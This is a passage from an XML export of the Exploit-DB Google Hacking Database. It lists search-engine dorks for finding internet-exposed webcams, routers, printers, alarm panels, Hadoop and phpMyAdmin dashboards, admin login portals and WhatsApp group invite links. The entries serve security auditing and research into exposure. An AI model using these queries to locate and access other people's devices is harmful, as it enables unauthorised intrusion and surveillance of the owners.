# Dork Sample: intext:&quot;https://chat.whatsapp.com/invite/&quot; intitle:&quot;hacking&quot;
# Dork Sample: intext:&quot;https://chat.whatsapp.com/invite/&quot; intitle:&quot;target company&quot;
# Date: 07/04/2018
# Contains sensitive information:
Link for Public And Private Groups of WhatsApp
# Dork Author: Carlos E. Vieira
</textualDescription>
<query>intext:&quot;https://chat.whatsapp.com/invite/&quot; intitle:&quot;Your Search For Company/Subject/Whatever&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;https://chat.whatsapp.com/invite/&quot; intitle:&quot;Your Search For Company/Subject/Whatever&quot;</querystring>
<edb></edb>
<date>2018-04-09</date>
<author>Carlos E. Vieira</author>
</entry>
<entry>
<id>6855</id>
<link>https://www.exploit-db.com/ghdb/6855</link>
<category>Various Online Devices</category>
<shortDescription>intext:&quot;Inserire il proprio codice per accedere al sistema&quot; &quot;Inserire codice&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;Inserire il proprio codice per accedere al sistema&quot; &quot;Inserire codice&quot;
# Various Online Devices
# Date: 31/03/2021
# Exploit Author: Mugdha Peter Bansode
--
Thanks &amp; Regards,
Mugdha Peter Bansode
</textualDescription>
<query>intext:&quot;Inserire il proprio codice per accedere al sistema&quot; &quot;Inserire codice&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Inserire il proprio codice per accedere al sistema&quot; &quot;Inserire codice&quot;</querystring>
<edb></edb>
<date>2021-04-05</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>6946</id>
<link>https://www.exploit-db.com/ghdb/6946</link>
<category>Various Online Devices</category>
<shortDescription>intext:&quot;LANCOM 1781VA (over ISDN)&quot;</shortDescription>
<textualDescription># Dork: intext:&quot;LANCOM 1781VA (over ISDN)&quot; </textualDescription>
<query>intext:&quot;LANCOM 1781VA (over ISDN)&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;LANCOM 1781VA (over ISDN)&quot;</querystring>
<edb></edb>
<date>2021-05-21</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>7043</id>
<link>https://www.exploit-db.com/ghdb/7043</link>
<category>Various Online Devices</category>
<shortDescription>intext:&quot;Live View&quot; inurl:ui3.htm</shortDescription>
<textualDescription># Google Dork: intext:&quot;Live View&quot; inurl:ui3.htm
# Various Online Devices
# Exploit Author: J. Igor Melo</textualDescription>
<query>intext:&quot;Live View&quot; inurl:ui3.htm</query>
<querystring>https://www.google.com/search?q=intext:&quot;Live View&quot; inurl:ui3.htm</querystring>
<edb></edb>
<date>2021-07-23</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>745</id>
<link>https://www.exploit-db.com/ghdb/745</link>
<category>Various Online Devices</category>
<shortDescription>intext:&quot;MaiLinX Alert (Notify)&quot; -site:networkprinters.com</shortDescription>
<textualDescription>Xerox DocuPrint printer models.</textualDescription>
<query>intext:&quot;MaiLinX Alert (Notify)&quot; -site:networkprinters.com</query>
<querystring>https://www.google.com/search?num=100&amp;q=intext%3A%22MaiLinX+Alert+%28Notify%29%22+-site%3Anetworkprinters.com</querystring>
<edb></edb>
<date>2004-12-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>874</id>
<link>https://www.exploit-db.com/ghdb/874</link>
<category>Various Online Devices</category>
<shortDescription>intext:&quot;Please enter correct password for Administrator Access. Thank you&quot; &quot;Copyright © 2003 SMC Networks, Inc. All rights reserved.&quot;</shortDescription>
<textualDescription>Finds SMC Routers.</textualDescription>
<query>intext:&quot;Please enter correct password for Administrator Access. Thank you&quot; &quot;Copyright © 2003 SMC Networks, Inc. All rights reserved.&quot;</query>
<querystring>https://www.google.com/search?q=intext%3A%22Please+enter+correct+password+for+Administrator+Access%2E+Thank+you%22+%22Copyright+%C2%A9+2003+SMC+Networks%2C+Inc%2E+All+rights+reserved%2E%22</querystring>
<edb></edb>
<date>2005-02-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>4290</id>
<link>https://www.exploit-db.com/ghdb/4290</link>
<category>Various Online Devices</category>
<shortDescription>intext:&quot;Powered by BOMGAR&quot;</shortDescription>
<textualDescription>intext:&quot;Powered by BOMGAR&quot;</textualDescription>
<query>intext:&quot;Powered by BOMGAR&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Powered by BOMGAR&quot;</querystring>
<edb></edb>
<date>2016-05-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>4244</id>
<link>https://www.exploit-db.com/ghdb/4244</link>
<category>Various Online Devices</category>
<shortDescription>intext:&quot;powered by webcamXP 5&quot;</shortDescription>
<textualDescription>Various webcamXP version 5! More info: http://webcamxp.com
Author: Augusto Pereira
http://www.augustopereira.com.br</textualDescription>
<query>intext:&quot;powered by webcamXP 5&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;powered by webcamXP 5&quot;</querystring>
<edb></edb>
<date>2016-03-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>4862</id>
<link>https://www.exploit-db.com/ghdb/4862</link>
<category>Various Online Devices</category>
<shortDescription>intext:&quot;Powered by www.yawcam.com&quot;</shortDescription>
<textualDescription>intext:&quot;Powered by www.yawcam.com&quot;
intext:&quot;Password Please! User: Pass: Fps. Quality. Scale. Sound. &quot;
Yawcam cameras online
ManhNho
</textualDescription>
<query>intext:&quot;Powered by www.yawcam.com&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Powered by www.yawcam.com&quot;</querystring>
<edb></edb>
<date>2018-06-18</date>
<author>ManhNho</author>
</entry>
<entry>
<id>979</id>
<link>https://www.exploit-db.com/ghdb/979</link>
<category>Various Online Devices</category>
<shortDescription>intext:&quot;Powered by: Adobe PrintGear&quot; inurl:admin</shortDescription>
<textualDescription>Printers equipped with Adobe's PrintGear technologyAdobe's PrintGear technology is a new printing architecture designed specifically for low-cost, high-quality output. At the core of this architecture is a custom chip, the PrintGear Imaging Processor (or PrintGear processor for short). This processor supplies the performance required for high-resolution output, yet helps keep the overall cost of the output device low.</textualDescription>
<query>intext:&quot;Powered by: Adobe PrintGear&quot; inurl:admin</query>
<querystring>https://www.google.com/search?q=intext%3A%22Powered+by%3A+Adobe+PrintGear%22+inurl%3Aadmin+</querystring>
<edb></edb>
<date>2005-05-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>669</id>
<link>https://www.exploit-db.com/ghdb/669</link>
<category>Various Online Devices</category>
<shortDescription>intext:&quot;Ready with 10/100T Ethernet&quot;</shortDescription>
<textualDescription>Xerox 860 and 8200 Printers.</textualDescription>
<query>intext:&quot;Ready with 10/100T Ethernet&quot;</query>
<querystring>https://www.google.com/search?q=intext:%22Ready+with+10/100T+Ethernet%22&amp;c2coff=1&amp;filter=0</querystring>
<edb></edb>
<date>2004-11-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>7816</id>
<link>https://www.exploit-db.com/ghdb/7816</link>
<category>Various Online Devices</category>
<shortDescription>intext:&quot;Real-time IP Camera Monitoring System&quot; intext:&quot;ActiveX Mode (For IE Browser)&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;Real-time IP Camera Monitoring System&quot; intext:&quot;ActiveX Mode (For IE Browser)&quot;
# Various Online Devices
# Date:16/11/2021
# Exploit Author: Yash Singh</textualDescription>
<query>intext:&quot;Real-time IP Camera Monitoring System&quot; intext:&quot;ActiveX Mode (For IE Browser)&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Real-time IP Camera Monitoring System&quot; intext:&quot;ActiveX Mode (For IE Browser)&quot;</querystring>
<edb></edb>
<date>2021-11-16</date>
<author>Yash Singh</author>
</entry>
<entry>
<id>5729</id>
<link>https://www.exploit-db.com/ghdb/5729</link>
<category>Various Online Devices</category>
<shortDescription>intext:&quot;Security is Off&quot; intitle:&quot;Namenode information&quot;</shortDescription>
<textualDescription>Description:
Unprotected public Hadoop Administration dashboards
Dork :
intext:&quot;Security is Off&quot; intitle:&quot;Namenode information&quot;
Author:
Vipin Joshi (@vocuzi)
</textualDescription>
<query>intext:&quot;Security is Off&quot; intitle:&quot;Namenode information&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Security is Off&quot; intitle:&quot;Namenode information&quot;</querystring>
<edb></edb>
<date>2020-02-10</date>
<author>vocuzi</author>
</entry>
<entry>
<id>5190</id>
<link>https://www.exploit-db.com/ghdb/5190</link>
<category>Various Online Devices</category>
<shortDescription>intext:&quot;series Network Configuration&quot; AND intext:&quot;canon&quot;</shortDescription>
<textualDescription>intext:&quot;series Network Configuration&quot; AND intext:&quot;canon&quot;
Found CANON device
Author : EJUPI Békim</textualDescription>
<query>intext:&quot;series Network Configuration&quot; AND intext:&quot;canon&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;series Network Configuration&quot; AND intext:&quot;canon&quot;</querystring>
<edb></edb>
<date>2019-04-23</date>
<author>EJUPI Békim</author>
</entry>
<entry>
<id>4127</id>
<link>https://www.exploit-db.com/ghdb/4127</link>
<category>Various Online Devices</category>
<shortDescription>intext:&quot;This is Apache Hadoop release&quot; &quot;Local Logs&quot;</shortDescription>
<textualDescription>Google dork Description: bypass information Apache Hadoop Service
Google search: intext:&quot;This is Apache Hadoop release&quot; &quot;Local Logs&quot;
Submited: 2015-11-12
Note:
view Hadoop information. - Yudha[at]glosmon.com</textualDescription>
<query>intext:&quot;This is Apache Hadoop release&quot; &quot;Local Logs&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;This is Apache Hadoop release&quot; &quot;Local Logs&quot;</querystring>
<edb></edb>
<date>2015-11-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>7200</id>
<link>https://www.exploit-db.com/ghdb/7200</link>
<category>Various Online Devices</category>
<shortDescription>intext:&quot;This page displays the general system information of the print server.&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;This page displays the general system information of the print server.&quot;
# Various Online Devices
# Date: 08/09/2021
# Exploit Author: J. Igor Melo</textualDescription>
<query>intext:&quot;This page displays the general system information of the print server.&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;This page displays the general system information of the print server.&quot;</querystring>
<edb></edb>
<date>2021-09-14</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>670</id>
<link>https://www.exploit-db.com/ghdb/670</link>
<category>Various Online Devices</category>
<shortDescription>intext:&quot;UAA (MSB)&quot; Lexmark -ext:pdf</shortDescription>
<textualDescription>Lexmark printers (T620, T522, Optra T614, E323, T622, Optra T610, Optra T616, T520 and Optra S 1855)</textualDescription>
<query>intext:&quot;UAA (MSB)&quot; Lexmark -ext:pdf</query>
<querystring>https://www.google.com/search?q=intext%3A%22UAA+%28MSB%29%22++Lexmark+-ext%3Apdf</querystring>
<edb></edb>
<date>2004-11-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>713</id>
<link>https://www.exploit-db.com/ghdb/713</link>
<category>Various Online Devices</category>
<shortDescription>intext:&quot;Videoconference Management System&quot; ext:htm</shortDescription>
<textualDescription>Tandberg video conferencing appliancesThe webinterface enables you to drop calls and to browse the internal phonebook</textualDescription>
<query>intext:&quot;Videoconference Management System&quot; ext:htm</query>
<querystring>https://www.google.com/search?q=intext:%22Videoconference+Management+System%22+ext:htm&amp;c2coff=1&amp;start=0&amp;sa=N</querystring>
<edb></edb>
<date>2004-11-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>1261</id>
<link>https://www.exploit-db.com/ghdb/1261</link>
<category>Various Online Devices</category>
<shortDescription>intext:&quot;Welcome to Taurus&quot; &quot;The Taurus Server Appliance&quot; intitle:&quot;The Taurus Server Appliance&quot;</shortDescription>
<textualDescription>Celestix Networks, Inc., the premier supplier of network server appliance, announces the Taurus(TM) Server Appliance, the all-in-one networking solution for the small to midsize business. The Taurus(TM) Server Appliance offers no compromise on functionality and scalability, and provides optimum efficiency at a lower price than traditional servers.With a single purchase, up to 250 users have integrated file and peripheral sharing, high-speed Internet access, email, scheduled back-up, VPN and secure firewall, anti-virus engine, and Intranet. Standard with built-in networking software and optimized applications, the Taurus(TM) supplies up to 40-GB of Internal storage. Seperate Admin and root password. Root password must be changed from the command prompt which means most Sysadmins won't change it from Default. Manuel hosted by the device no password needed.</textualDescription>
<query>intext:&quot;Welcome to Taurus&quot; &quot;The Taurus Server Appliance&quot; intitle:&quot;The Taurus Server Appliance&quot;</query>
<querystring>https://www.google.com/search?q=intext:%22Welcome+to+Taurus%22+%22The+Taurus+Server+Appliance%22+intitle:%22The+Taurus+Server+Appliance%22&amp;rls=org.mozilla:en-US:official&amp;filter=0</querystring>
<edb></edb>
<date>2006-02-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>3800</id>
<link>https://www.exploit-db.com/ghdb/3800</link>
<category>Various Online Devices</category>
<shortDescription>intext:&quot;You may also donate through the Moneybookers account mb@dd-wrt&quot;</shortDescription>
<textualDescription>Still find alot of equipment running v24 sp1 </textualDescription>
<query>intext:&quot;You may also donate through the Moneybookers account mb@dd-wrt&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;You may also donate through the Moneybookers account mb@dd-wrt&quot;</querystring>
<edb></edb>
<date>2012-08-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>1281</id>
<link>https://www.exploit-db.com/ghdb/1281</link>
<category>Various Online Devices</category>
<shortDescription>intext:&quot;you to handle frequent configuration jobs easily and quickly&quot; | intitle:&quot;Show/Search other devices&quot;</shortDescription>
<textualDescription>ELSA DSL lan modems.</textualDescription>
<query>intext:&quot;you to handle frequent configuration jobs easily and quickly&quot; | intitle:&quot;Show/Search other devices&quot;</query>
<querystring>https://www.google.com/search?q=intext:%22you+to+handle+frequent+configuration+jobs+easily+and+quickly%22+%7C+intitle:%22Show/Search+other+devices%22&amp;num=100&amp;filter=0</querystring>
<edb></edb>
<date>2006-03-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>6923</id>
<link>https://www.exploit-db.com/ghdb/6923</link>
<category>Various Online Devices</category>
<shortDescription>intext:@print.epsonconnect.com intitle:series</shortDescription>
<textualDescription># Google Dork: intext:@print.epsonconnect.com intitle:series
# Date: 2021-05-07
# Exploit Author: Anmol K Sachan </textualDescription>
<query>intext:@print.epsonconnect.com intitle:series</query>
<querystring>https://www.google.com/search?q=intext:@print.epsonconnect.com intitle:series</querystring>
<edb></edb>
<date>2021-05-13</date>
<author>Anmol K Sachan</author>
</entry>
<entry>
<id>4783</id>
<link>https://www.exploit-db.com/ghdb/4783</link>
<category>Various Online Devices</category>
<shortDescription>intext:build:SVNTag= JBoss intitle:Administration Console inurl:web-console</shortDescription>
<textualDescription>JBoss AS management console.
Author: Parth S. Patel
https://ca.linkedin.com/in/parthpateloscp
</textualDescription>
<query>intext:build:SVNTag= JBoss intitle:Administration Console inurl:web-console</query>
<querystring>https://www.google.com/search?q=intext:build:SVNTag= JBoss intitle:Administration Console inurl:web-console</querystring>
<edb></edb>
<date>2018-04-17</date>
<author>Parth S. Patel</author>
</entry>
<entry>
<id>4353</id>
<link>https://www.exploit-db.com/ghdb/4353</link>
<category>Various Online Devices</category>
<shortDescription>intext:SOAP 1.1 intext:SOAP 1.2 intext:UPLOAD intext:GET intext:POST inurl:op</shortDescription>
<textualDescription>Google Dork: intext:SOAP 1.1 intext:SOAP 1.2 intext:UPLOAD intext:GET
intext:POST inurl:op
Author: Aconite33
Description: Identify vulnerable sites that have SOAP, POST/GET functions</textualDescription>
<query>intext:SOAP 1.1 intext:SOAP 1.2 intext:UPLOAD intext:GET intext:POST inurl:op</query>
<querystring>https://www.google.com/search?q=intext:SOAP 1.1 intext:SOAP 1.2 intext:UPLOAD intext:GET intext:POST inurl:op</querystring>
<edb></edb>
<date>2016-11-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>4460</id>
<link>https://www.exploit-db.com/ghdb/4460</link>
<category>Various Online Devices</category>
<shortDescription>intext:VIEWS · Server: - Database: information_schema - Table: SCHEMA_PRIVILEGES · Browse · Structure · SQL · Search · Export</shortDescription>
<textualDescription>Description : This google dork can access many websites phpmyadmin web server.
Google dork: intext:VIEWS · Server: - Database: information_schema - Table: SCHEMA_PRIVILEGES · Browse · Structure · SQL · Search · Export.
This google dork created by dekingofcyber( SIVABALAN )</textualDescription>
<query>intext:VIEWS · Server: - Database: information_schema - Table: SCHEMA_PRIVILEGES · Browse · Structure · SQL · Search · Export</query>
<querystring>https://www.google.com/search?q=intext:VIEWS · Server: - Database: information_schema - Table: SCHEMA_PRIVILEGES · Browse · Structure · SQL · Search · Export</querystring>
<edb></edb>
<date>2017-05-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>5586</id>
<link>https://www.exploit-db.com/ghdb/5586</link>
<category>Various Online Devices</category>
<shortDescription>intext:{{szErrorTip}} inurl:/doc/page/login.asp</shortDescription>
<textualDescription>Discover Hikvision IP cameras facing the internet
</textualDescription>
<query>intext:{{szErrorTip}} inurl:/doc/page/login.asp</query>
<querystring>https://www.google.com/search?q=intext:{{szErrorTip}} inurl:/doc/page/login.asp</querystring>
<edb></edb>
<date>2019-10-18</date>
<author>Oscar Gil Gutierrez</author>
</entry>
<entry>
<id>5059</id>
<link>https://www.exploit-db.com/ghdb/5059</link>
<category>Various Online Devices</category>
<shortDescription>intitle: &quot;Nexus Repository Manager&quot;</shortDescription>
<textualDescription>*Google dork description: *Sites running the Nexus Repository Manager
*Google Search:* intitle: &quot;Nexus Repository Manager&quot;
*Submitted by:* Alfie
Website: (https://the-infosec.com)
</textualDescription>
<query>intitle: &quot;Nexus Repository Manager&quot;</query>
<querystring>https://www.google.com/search?q=intitle: &quot;Nexus Repository Manager&quot;</querystring>
<edb></edb>
<date>2018-12-17</date>
<author>Alfie</author>
</entry>
<entry>
<id>8172</id>
<link>https://www.exploit-db.com/ghdb/8172</link>
<category>Various Online Devices</category>
<shortDescription>intitle: &quot;webcam&quot; site: &quot;live&quot;</shortDescription>
<textualDescription># Google Dork: intitle: &quot;webcam&quot; site: &quot;live&quot;
# Various Online Devices
# Date:02/05/2023
# Exploit Author: Ramjan Ali Sabber</textualDescription>
<query>Re: GHDB - Dork</query>
<querystring>https://www.google.com/search?q=Re: GHDB - Dork</querystring>
<edb></edb>
<date>2023-05-02</date>
<author>Ramjan Ali Sabber</author>
</entry>
<entry>
<id>7599</id>
<link>https://www.exploit-db.com/ghdb/7599</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot; - General Status [none]&quot;</shortDescription>
<textualDescription> # Google Dork: intitle:&quot; - General Status [none]&quot;
# Various Online Devices
# Date: 04/11/2021
# Exploit Author: Nisrin Ahmed
</textualDescription>
<query>intitle:&quot; - General Status [none]&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot; - General Status [none]&quot;</querystring>
<edb></edb>
<date>2021-11-05</date>
<author>Nisrin Ahmed</author>
</entry>
<entry>
<id>7843</id>
<link>https://www.exploit-db.com/ghdb/7843</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot; SyncThru Web Service&quot; intext:&quot;Supplies Information&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot; SyncThru Web Service&quot; intext:&quot;Supplies Information&quot;
# Various Online Devices
# Date:14/06/2022
# Exploit Author: Yash Singh</textualDescription>
<query>intitle:&quot; SyncThru Web Service&quot; intext:&quot;Supplies Information&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot; SyncThru Web Service&quot; intext:&quot;Supplies Information&quot;</querystring>
<edb></edb>
<date>2022-06-14</date>
<author>Yash Singh</author>
</entry>
<entry>
<id>980</id>
<link>https://www.exploit-db.com/ghdb/980</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;--- VIDEO WEB SERVER ---&quot; intext:&quot;Video Web Server&quot; &quot;Any time &amp; Any where&quot; username password</shortDescription>
<textualDescription>AVTech Video Web Server is a surveillance producted that is directly connected to the internet It could enable the AVTech DVR series products or any camera to connect to Internet for remote monitoring or remote control. Besides, it could also enable 2 video input to connect to Internet for remote monitoring and recording. Besides the web interface it also offers an ftp server.</textualDescription>
<query>intitle:&quot;--- VIDEO WEB SERVER ---&quot; intext:&quot;Video Web Server&quot; &quot;Any time &amp; Any where&quot; username password</query>
<querystring>https://www.google.com/search?q=%0D%0Aintitle:%22---+VIDEO+WEB+SERVER+---%22+intext:%22Video+Web+Server%22+%22Any+time+%26+Any+where%22+username+password+&amp;c2coff=1&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2005-05-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>6982</id>
<link>https://www.exploit-db.com/ghdb/6982</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;3CX Phone System Management Console&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;3CX Phone System Management Console&quot;
# Various Online Devices
# Date: 03/06/2021
# Exploit Author: J. Igor Melo
</textualDescription>
<query>intitle:&quot;3CX Phone System Management Console&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;3CX Phone System Management Console&quot;</querystring>
<edb></edb>
<date>2021-06-03</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>7052</id>
<link>https://www.exploit-db.com/ghdb/7052</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;7100 login&quot; &quot;lancom&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;7100 login&quot; &quot;lancom&quot;
# Category: Pages Containing Login Portals
# Date: 05/07/2021
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;7100 login&quot; &quot;lancom&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;7100 login&quot; &quot;lancom&quot;</querystring>
<edb></edb>
<date>2021-08-20</date>
<author>s Thakur</author>
</entry>
<entry>
<id>6975</id>
<link>https://www.exploit-db.com/ghdb/6975</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;::: ACEmanager :::&quot;</shortDescription>
<textualDescription># Dork: intitle:&quot;::: ACEmanager :::&quot;</textualDescription>
<query>intitle:&quot;::: ACEmanager :::&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;::: ACEmanager :::&quot;</querystring>
<edb></edb>
<date>2021-06-01</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>1248</id>
<link>https://www.exploit-db.com/ghdb/1248</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;::::: INTELLINET IP Camera Homepage :::::&quot; OR inurl:/main_activex.asp OR inurl:/main_applet.cgi</shortDescription>
<textualDescription>A variation on Jeffball55's original Intellinet Ip Camera.This search finds several more web cams.A suggested secondary search:&quot;Administrator Menu&quot; &quot;camera Name&quot; &quot;Location&quot; &quot;frame rate&quot; intitle:network.camera -pdfThanks jeffball.</textualDescription>
<query>intitle:&quot;::::: INTELLINET IP Camera Homepage :::::</query>
<querystring>https://www.google.com/search?q=intitle%3A%22%3A%3A%3A%3A%3A+INTELLINET+IP+Camera+Homepage+%3A%3A%3A%3A%3A%22+OR+inurl%3A%2Fmain_activex.asp+OR+inurl%3A%2Fmain_applet.cgi&amp;sourceid=mozilla-search&amp;start=0&amp;start=0&amp;ie=utf-8&amp;oe=utf-8&amp;rls=org.m</querystring>
<edb></edb>
<date>2006-01-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>7224</id>
<link>https://www.exploit-db.com/ghdb/7224</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;ACEmanager&quot; &quot;ALEOS Version&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;ACEmanager&quot; &quot;ALEOS Version&quot;
# Various Online Devices
# Date: 13/09/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;ACEmanager&quot; &quot;ALEOS Version&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;ACEmanager&quot; &quot;ALEOS Version&quot;</querystring>
<edb></edb>
<date>2021-09-15</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>905</id>
<link>https://www.exploit-db.com/ghdb/905</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;actiontec&quot; main setup status &quot;Copyright 2001 Actiontec Electronics Inc&quot;</shortDescription>
<textualDescription>Actiontec Routers.</textualDescription>
<query>intitle:&quot;actiontec&quot; main setup status &quot;Copyright 2001 Actiontec Electronics Inc&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22actiontec%22+main+setup+status+%22Copyright+2001+Actiontec+Electronics+Inc%22&amp;rls=org.mozilla:en-US:official&amp;filter=0</querystring>
<edb></edb>
<date>2005-03-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>886</id>
<link>https://www.exploit-db.com/ghdb/886</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;active webcam page&quot;</shortDescription>
<textualDescription>searches for &quot;Active Webcam&quot; feeds on websites, a popular USB webcam interface.</textualDescription>
<query>intitle:&quot;active webcam page&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22active+webcam+page%22</querystring>
<edb></edb>
<date>2005-02-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>7470</id>
<link>https://www.exploit-db.com/ghdb/7470</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;ADSL Router&quot; inurl:&quot;/login.htm&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;ADSL Router&quot; inurl:&quot;/login.htm&quot;
# Various Online Devices
# Date: 20/10/2021
# Exploit Author: Yash Singh</textualDescription>
<query>intitle:&quot;ADSL Router&quot; inurl:&quot;/login.htm&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;ADSL Router&quot; inurl:&quot;/login.htm&quot;</querystring>
<edb></edb>
<date>2021-10-21</date>
<author>Yash Singh</author>
</entry>
<entry>
<id>6819</id>
<link>https://www.exploit-db.com/ghdb/6819</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Advanced Setup - Security - Admin User Name &amp; Password&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Advanced Setup - Security - Admin User Name &amp; Password&quot;
# Various online devices (ActionTec modem configuration).
# Date: 03/03/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;Advanced Setup - Security - Admin User Name &amp; Password&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Advanced Setup - Security - Admin User Name &amp; Password&quot;</querystring>
<edb></edb>
<date>2021-03-03</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6713</id>
<link>https://www.exploit-db.com/ghdb/6713</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Agent web client: Phone Login&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Agent web client: Phone Login&quot;
# Pages containing login portals.
# Date: 3/12/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;Agent web client: Phone Login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Agent web client: Phone Login&quot;</querystring>
<edb></edb>
<date>2020-12-04</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6969</id>
<link>https://www.exploit-db.com/ghdb/6969</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;Alarm Panel&quot; intext:&quot;Climax Tech. Co., Ltd.&quot;</shortDescription>
<textualDescription># Dork: intitle:&quot;Alarm Panel&quot; intext:&quot;Climax Tech. Co., Ltd.&quot;</textualDescription>
<query>intitle:&quot;Alarm Panel&quot; intext:&quot;Climax Tech. Co., Ltd.&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Alarm Panel&quot; intext:&quot;Climax Tech. Co., Ltd.&quot;</querystring>
<edb></edb>
<date>2021-05-28</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>3992</id>
<link>https://www.exploit-db.com/ghdb/3992</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;AP Router New Generation&quot; intext:&quot;Status do AP Router&quot;</shortDescription>
<textualDescription>intitle:&quot;AP Router New Generation&quot; intext:&quot;Status do AP Router&quot;
Share-Link</textualDescription>
<query>intitle:&quot;AP Router New Generation&quot; intext:&quot;Status do AP Router&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;AP Router New Generation&quot; intext:&quot;Status do AP Router&quot;</querystring>
<edb></edb>
<date>2015-02-17</date>
<author>anonymous</author>
</entry>
<entry>
<id>1279</id>
<link>https://www.exploit-db.com/ghdb/1279</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;AR-*&quot; &quot;browser of frame dealing is necessary&quot;</shortDescription>
<textualDescription>A few Sharp printers ..</textualDescription>
<query>intitle:&quot;AR-*&quot; &quot;browser of frame dealing is necessary&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22AR-*%22+%22browser+of+frame+dealing+is+necessary%22&amp;filter=0</querystring>
<edb></edb>
<date>2006-03-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>757</id>
<link>https://www.exploit-db.com/ghdb/757</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;AudioReQuest.web.server&quot;</shortDescription>
<textualDescription>Audio ReQuest home CD/MP3 player. Various information about the configuration of the host and surrounding network can be found out by visiting the main page of this server. Beyond that, you could peruse someones MP3 collection!</textualDescription>
<query>intitle:&quot;AudioReQuest.web.server&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22AudioReQuest.web.server%22</querystring>
<edb></edb>
<date>2004-12-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>1019</id>
<link>https://www.exploit-db.com/ghdb/1019</link>
<category>Various Online Devices</category>
<shortDescription>intitle:&quot;AXIS 240 Camera Server&quot; intext:&quot;server push&quot; -help</shortDescription>
<textualDescription>This search finds AXIS 240 Camera Servers (as opposed to just the cameras) which can host many cameras, that may not be found in other searches, since they are not necessarily IP based.</textualDescription>
<query>intitle:&quot;AXIS 240 Camera Server&quot; intext:&quot;server push&quot; -help</query>
